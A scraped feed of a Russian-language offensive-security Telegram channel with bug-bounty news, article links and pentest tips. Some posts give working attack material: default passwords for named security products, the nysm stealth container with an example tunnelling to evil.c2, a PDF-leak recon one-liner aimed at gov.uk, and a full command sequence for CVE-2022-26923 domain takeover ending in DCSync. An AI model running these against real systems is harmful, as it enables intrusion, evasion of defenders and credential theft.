Forwarded from BI.ZONE Bug Bounty
Мы думали-думали, что же такое особенное подарить нашей десятке лучших... А потом как придумали! На двух загадочных фото в посте — подсказка ;)
А это список самых крутых багхантеров на нашей платформе в 2023 году:
Хотим сказать спасибо всем, кто упорно багхантил на платформе весь год и поддерживал нас.
А всех из десятки от души поздравляем, в ближайшее время свяжемся и отправим подарки.
Stay tuned!
UPD
arkiix влетел в рейтинг уже после подведения итогов, так что наш топ-10 магией Деда Мороза превратился в топ-11. Так держать!
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤🔥1🎄1 1
E-mail Injection; Инъекции в почтовую функциональность веб-приложений
Порой разработчикам необходимо создавать формы – разделы для сбора информации от пользователей веб-приложения. Было придумано множество способов обработки и сбора ответов пользователей на формы. Выбор подходящего зависит от спектра условий: вида и предполагаемого объёма данных, допустимого объёма выделенного хранилища, желаемых характеристик доступа, ... ;
Так сложилось, что одним из вариантов решения упомянутой задачи является использование электронной почты. Электронная почта – комплексная технология, в работе которой задействован целый список компонентов.
👉 Сохраняй
🌚 @poxek
Порой разработчикам необходимо создавать формы – разделы для сбора информации от пользователей веб-приложения. Было придумано множество способов обработки и сбора ответов пользователей на формы. Выбор подходящего зависит от спектра условий: вида и предполагаемого объёма данных, допустимого объёма выделенного хранилища, желаемых характеристик доступа, ... ;
Так сложилось, что одним из вариантов решения упомянутой задачи является использование электронной почты. Электронная почта – комплексная технология, в работе которой задействован целый список компонентов.
Please open Telegram to view this post
VIEW IN TELEGRAM
GIGANEWS. Главные события 2023 года по версии «Хакера»
Год подходит к концу, некоторые уже начинают резать салаты, а значит, пришло время оглянуться назад и вспомнить самые важные, интересные и забавные события, которыми он нам запомнится. По традиции мы составили для тебя подборку наиболее ярких взломов, атак, уязвимостей, фейлов и других событий уходящего 2023 года. Будет интересно, погнали!
В статье подвели итоги по следующим аспектам:
- Атака года
- Уязвимость года
- Утечка года
- Исследование года
- Блокировка года
- Нарушитель приватности года
- Малварь года
- Хардверный взлом года
- Странность года
- Фейл года
- Хайп года
👉 Очень советую прочитать тем, кто особо не следил за ИБ новостями.
🌚 @poxek
Год подходит к концу, некоторые уже начинают резать салаты, а значит, пришло время оглянуться назад и вспомнить самые важные, интересные и забавные события, которыми он нам запомнится. По традиции мы составили для тебя подборку наиболее ярких взломов, атак, уязвимостей, фейлов и других событий уходящего 2023 года. Будет интересно, погнали!
В статье подвели итоги по следующим аспектам:
- Атака года
- Уязвимость года
- Утечка года
- Исследование года
- Блокировка года
- Нарушитель приватности года
- Малварь года
- Хардверный взлом года
- Странность года
- Фейл года
- Хайп года
Please open Telegram to view this post
VIEW IN TELEGRAM
Не ну вы поняли)
Новые программы для тех, кто не собирается отдыхать на новогодние праздники
🌚 @poxek
Новые программы для тех, кто не собирается отдыхать на новогодние праздники
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Android Security & Malware
Android Deep Links exploitation
https://z4ki.medium.com/android-deep-links-exploitation-4abade4d45b4
https://z4ki.medium.com/android-deep-links-exploitation-4abade4d45b4
Medium
Android Deep Links exploitation
Recently, I have been studying Android penetration testing, and I came across a new topic called ‘Deep Links’. Since it is a new topic to…
В следующем году постарается сделать как минимум х1.5, а то и больше!!
А также +3.5к подписчиков на канале, то бишь канал за этот год вырос в более чем 2 раза. Всем спасибо, что вы были этот год со мной. Следующий год обещает быть ещё более взрывным!!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤25❤🔥8🔥4 3👏1
Похек
Меня тут поправили. Не в 2 раза канал вырос, а в 6 раз практически 😁
☃14 4🎄3 1
Новые партнёрства, постараюсь выступать почаще (если буду успевать готовить темы), прогрессивный рост канала, улучшение контента: постараюсь делать контент одновременно для начинающих ребят и для тех, кто уже разбираются.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤25 7🔥6🎄4❤🔥2 2⚡1
Всех поздравляю с Новым Годом!!
🌲 🌲 🌲 🌚 🌚 🌚 💰 💰 🎁 🎁
Please open Telegram to view this post
VIEW IN TELEGRAM
❤39🔥10☃6🎄4 1
Forwarded from true_security
на пентестах бывают случаи когда компрометация происходит через средства обнаружения атак и средства защиты....далеко не все фильтруют сетевой доступ к компонентам СЗИ.
Так сказать, спасибо за дефолтные пароли:
Докидывайте дефолтные пароли сзи в комментах)
Так сказать, спасибо за дефолтные пароли:
- rvision soar/deception/etc... ssh root:pxtm0222; postgres rvision:pxtm0222
- maxpatrol VM: Administrator:P@ssw0rd
- maxpatrol siem: Administrator:P@ssw0rd; rabbitmq: siem:P@ssw0rd или mpx_siem:P@ssw0rd
- pt xdr: Administrator:P@ssw0rd
- pt nad: administrator:P0sitive или administrator:Administr@t0r
- security vision soar: postgres postgres:1q2w#E$R
- kuma (kaspersky siem): admin:mustB3Ch@ng3d!
Докидывайте дефолтные пароли сзи в комментах)
🔥12 2
Please open Telegram to view this post
VIEW IN TELEGRAM
❤38🔥13🎉8❤🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
🔴 nysm
Скрытый контейнер для постэксплуатации
#eBPF #offensive
С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое
Как это работает?
Установка:
Использование:
👉 https://github.com/eeriedusk/nysm
🌚 @poxek
Скрытый контейнер для постэксплуатации
#eBPF #offensive
С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое
Как это работает?
Поскольку eBPF не может перезаписывать возвращаемые значения или адреса ядра, наша цель - найти вызов самого низкого уровня, взаимодействующий с адресом пользовательского пространства, чтобы перезаписать его значение и скрыть нужные объекты. Чтобы отличить события nysm от других, все выполняется в отдельном пространстве имен PID.
Установка:
sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y; git clone https://github.com/eeriedusk/nysm; cd nysm; bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h; make
Использование:
Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.
-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message
# Примеры
./nysm bash
./nysm -r ssh user@domain
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12 3 3😎1
Forwarded from SHADOW:Group
Исследуя таргет часто попадается много pdf'ок, которые могут содержать конфиденциальные данные. Просматривать вручную все это очень долго, а потому можно попробовать автоматизировать этот процесс.
.pdf с помощью Grep.sudo apt install poppler-utils
internal use only" или "confidential" и т.д.В результате чего получим такую команду:
for i in $(echo "gov.uk" | gau --subs --threads 16 | grep -E -o 'https?://[^[:space:]]+\.pdf' | httpx -silent -mc 200); do if curl -k -s $i | pdftotext -q - - | grep -Eaiq 'confidential|internal use only'; then echo $i | tee output.txt; fi; done
Эта команда сканирует веб-сайт "
gov.uk" и его поддомены в поиске URL-ов с PDF-файлами. Затем она проверяет каждый PDF-файл на наличие строк "confidential" или "internal use only" и записывает эти URL-ы в файл "output.txt".Вы можете включить свое творческое мышление и попытаться изменить этот скрипт по своему усмотрению. Например, используя katana вместо gau или проверяя наличие других чувствительных слов, используя другие расширения и т.д. Использование собственного творческого подхода даст вам максимальную отдачу!
#web #recon #leak
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21 4❤2
This media is not supported in your browser
VIEW IN TELEGRAM
🔵 Галопом по Европам: Легитимные процессы Windows на пальцах
#windows
Статья-памятка - быстро и понятно о легитимных процессах Windows: какой процесс за что отвечает, какие нормальные свойства имеют процессы, и заправка в виде небольшого количества краткой, но полезной информации.
Подойдет всем - и тем, кто боится страшных букв в Диспетчере задач, и тем, кому просто интересно, что за что отвечает, и для чего это все нужно.
⚡️ https://habr.com/en/articles/784960/
🌚 @poxek
#windows
Статья-памятка - быстро и понятно о легитимных процессах Windows: какой процесс за что отвечает, какие нормальные свойства имеют процессы, и заправка в виде небольшого количества краткой, но полезной информации.
Подойдет всем - и тем, кто боится страшных букв в Диспетчере задач, и тем, кому просто интересно, что за что отвечает, и для чего это все нужно.
Статья за авторством @exc3pt10n
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13 6❤🔥2 2
Top 10 web hacking techniques of 2023 - конкурс открыт
#portswigger
За последний год множество исследователей в области безопасности поделились своими ресерчами с сообществом в виде записей в блогах, презентаций и технических статей.
Однако из-за огромного объема хорошие статьи могут быть упущены из виду и быстро забыты. Поэтому с 2006 года сообщество ежегодно объединяется для отбора самых интересных работ.
Подача заявок:
Чтобы подать заявку, просто укажите ссылку на исследование и, по желанию, краткий комментарий, объясняющий, что нового в этой работе.
❤️ Подать заявку на номинацию
Ниже указал актуальный список статей, которые уже отобрали для оценки в номинацию:
- Ransacking your password reset tokens
mTLS: When certificate authentication is done wrong
- Smashing the state machine: the true potential of web race conditions
- Bypass firewalls with of-CORs and typo-squatting
- RCE via LDAP truncation on hg.mozilla.org
- Cookie Bugs - Smuggling & Injection
- OAuth 2.0 Redirect URI Validation Falls Short, Literally
- Prototype Pollution in Python - Abdulrah33m's Blog
- Pretalx Vulnerabilities: How to get accepted at every conference
- From Akamai to F5 to NTLM... with love.
- Сan I speak to your manager? hacking root EPP servers to take control of zones
- Blind CSS Exfiltration: exfiltrate unknown web pages
- Compromising F5 BIGIP with Request Smuggling
- Server-side prototype pollution: Black-box detection without the DoS
- Tricks for Reliable Split-Second DNS Rebinding in Chrome and Safari
- HTML Over the Wire
- SMTP Smuggling - Spoofing E-Mails Worldwide
- DOM-based race condition: racing in the browser for fun
- Metamask Snaps: Playing in the Sand
- CVE-2022-4908: SOP bypass in Chrome using Navigation API
- Code Vulnerabilities Put Proton Mails at Risk
🌚 @poxek
#portswigger
За последний год множество исследователей в области безопасности поделились своими ресерчами с сообществом в виде записей в блогах, презентаций и технических статей.
Однако из-за огромного объема хорошие статьи могут быть упущены из виду и быстро забыты. Поэтому с 2006 года сообщество ежегодно объединяется для отбора самых интересных работ.
Подача заявок:
Чтобы подать заявку, просто укажите ссылку на исследование и, по желанию, краткий комментарий, объясняющий, что нового в этой работе.
Ниже указал актуальный список статей, которые уже отобрали для оценки в номинацию:
- Ransacking your password reset tokens
mTLS: When certificate authentication is done wrong
- Smashing the state machine: the true potential of web race conditions
- Bypass firewalls with of-CORs and typo-squatting
- RCE via LDAP truncation on hg.mozilla.org
- Cookie Bugs - Smuggling & Injection
- OAuth 2.0 Redirect URI Validation Falls Short, Literally
- Prototype Pollution in Python - Abdulrah33m's Blog
- Pretalx Vulnerabilities: How to get accepted at every conference
- From Akamai to F5 to NTLM... with love.
- Сan I speak to your manager? hacking root EPP servers to take control of zones
- Blind CSS Exfiltration: exfiltrate unknown web pages
- Compromising F5 BIGIP with Request Smuggling
- Server-side prototype pollution: Black-box detection without the DoS
- Tricks for Reliable Split-Second DNS Rebinding in Chrome and Safari
- HTML Over the Wire
- SMTP Smuggling - Spoofing E-Mails Worldwide
- DOM-based race condition: racing in the browser for fun
- Metamask Snaps: Playing in the Sand
- CVE-2022-4908: SOP bypass in Chrome using Navigation API
- Code Vulnerabilities Put Proton Mails at Risk
Моё лично мнение, что список очень интересный и в нашем комьюнити могут найтись те специалисты, которые захотят или заинтересуются отправкой своих работ в эту номинацию.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤16 2
Forwarded from wr3dmast3r vs pentest
Многие оставляют недоработанными вектора атак с self-XSS или XSS, заблокированной CSP. Иногда стоит уделить достаточно внимания каждой такой находке и посмотреть на уязвимость с другой стороны 😈
В этой статье мы рассмотрим различные методы и техники, которые расширяют границы XSS-атак: эксплуатацию XSS через service-worker, self-XSS в один клик и другие сочетания уязвимостей💎
https://telegra.ph/XSS-Advanced-Level-01-09
В этой статье мы рассмотрим различные методы и техники, которые расширяют границы XSS-атак: эксплуатацию XSS через service-worker, self-XSS в один клик и другие сочетания уязвимостей
https://telegra.ph/XSS-Advanced-Level-01-09
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
XSS Advanced Level
Я часто встречаю XSS, которые не дают возможности использовать что-то кроме вызова алерта, или какие-нибудь Self-XSS без возможности эксплуатации. Однако, если приложить достаточно усилий, то можно докрутить даже многие Self-XSS, используя их в комбинации…
❤🔥11⚡4😈2 2
Потратился на праздниках? Самое время начать багхантить!
Если кто не заметил, в конце года на Standoff появилось пять новых программ с выплатами до 1 млн рублей. И многие из них закроются уже в конце января.
🔜 Но если начать ломать прямо сейчас, есть все шансы получить максимальное баунти (а за некоторые криты дают даже ящик фирменного «Блэк Хета» от Standoff 365 в качестве приятного бонуса).
Если кто не заметил, в конце года на Standoff появилось пять новых программ с выплатами до 1 млн рублей. И многие из них закроются уже в конце января.
Please open Telegram to view this post
VIEW IN TELEGRAM
👏9
Forwarded from PurpleBear (Vadim Shelest)
Матрица компетенций
Всем привет! Надеюсь, что все хорошо отдохнули, набрались сил и готовы к покорению новых профессиональных и карьерных вершин🏆
В нашей отрасли очень много направлений для профессионального роста и развития навыков и компетенций, поэтому очень часто особенно у новичков возникает закономерный вопрос, какой путь выбрать, что и в какой последовательности изучать?! 😜
Но сначала все таки нужно определиться с целями и направлением развития, а потом качать соответствующие навыки и компетенции. О целеполагании и приоритетах мы поговорим в следующих заметках в рамках этой новой менеджерской рубрики😎
А сейчас, немного забегая вперед рассмотрим методы достижения цели повышения грейда
Это пока только лишь верхнеуровневая структура, в планах детально описать каждый этап относительно хард и софт скиллов с подробными рекомендациями по развитию (референсы на литературу, статьи, лабы и прочее) чтобы было удобно иметь под рукой план развития для каждого грейда. А также добавить ключевые управленческие компетенции необходимые для эффективного менеджмента команды.
PS: Можно оставлять комментарии и предложения прямо в доке, ну и финальную версию обязательно расшарю для публичного доступа без ограничений
Всем привет! Надеюсь, что все хорошо отдохнули, набрались сил и готовы к покорению новых профессиональных и карьерных вершин🏆
В нашей отрасли очень много направлений для профессионального роста и развития навыков и компетенций, поэтому очень часто особенно у новичков возникает закономерный вопрос, какой путь выбрать, что и в какой последовательности изучать?! 😜
Но сначала все таки нужно определиться с целями и направлением развития, а потом качать соответствующие навыки и компетенции. О целеполагании и приоритетах мы поговорим в следующих заметках в рамках этой новой менеджерской рубрики😎
А сейчас, немного забегая вперед рассмотрим методы достижения цели повышения грейда
offensive security специалиста. Я уже рассказывал про такой инструмент, как матрица компетенций от компании DETEACT, а сегодня я бы хотел пошарить черновик нашей подобной матрицы. Это пока только лишь верхнеуровневая структура, в планах детально описать каждый этап относительно хард и софт скиллов с подробными рекомендациями по развитию (референсы на литературу, статьи, лабы и прочее) чтобы было удобно иметь под рукой план развития для каждого грейда. А также добавить ключевые управленческие компетенции необходимые для эффективного менеджмента команды.
PS: Можно оставлять комментарии и предложения прямо в доке, ну и финальную версию обязательно расшарю для публичного доступа без ограничений
Google Docs
Матрица компетенций
Матрица компетенций
Позиция: Стажер (нет опыта работы) Ключевые навыки: Понимание основных принципов работы инструментов безопасности ОС (Linux/Windows) на уровне пользователя Понимание основных принципов работы и построения сетей на начальном…
Позиция: Стажер (нет опыта работы) Ключевые навыки: Понимание основных принципов работы инструментов безопасности ОС (Linux/Windows) на уровне пользователя Понимание основных принципов работы и построения сетей на начальном…
🔥11❤3
Forwarded from Purple Chronicles (ELK Enjoyer)
Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️
Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).
🐍 Для эксплуатации используем утилиту Certipy, краткая справка по ней представлена ниже:
Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Возвращаемся на атакующий хост и запрашиваем новый сертификат:
Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!🔺
#пентест #AD
Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).
# УстановкаНачнем атаку с добавления компьютера в домен при помощи Impacket-Addcomputer
pip install certipy-ad
# Запрос сертификата
# для certipy-ad v3.0.0:
certipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName
# для certipy-ad v4.8.2:
certipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10
# Авторизация с сертификатом для извлечения NTLM-хэша:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10
addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'Запрашиваем сертификат для учётной записи компьютера (шаблон Machine) и авторизуемся с ним:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine
certipy auth -pfx testpc.pfx
Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # вернёт ошибку из-за дублирующейся SPN
Set-ADComputer TESTPC -ServicePrincipalName @{} # обнуляем SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local
Возвращаемся на атакующий хост и запрашиваем новый сертификат:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine
Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733
Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt
Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!
#пентест #AD
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13 5 3❤🔥2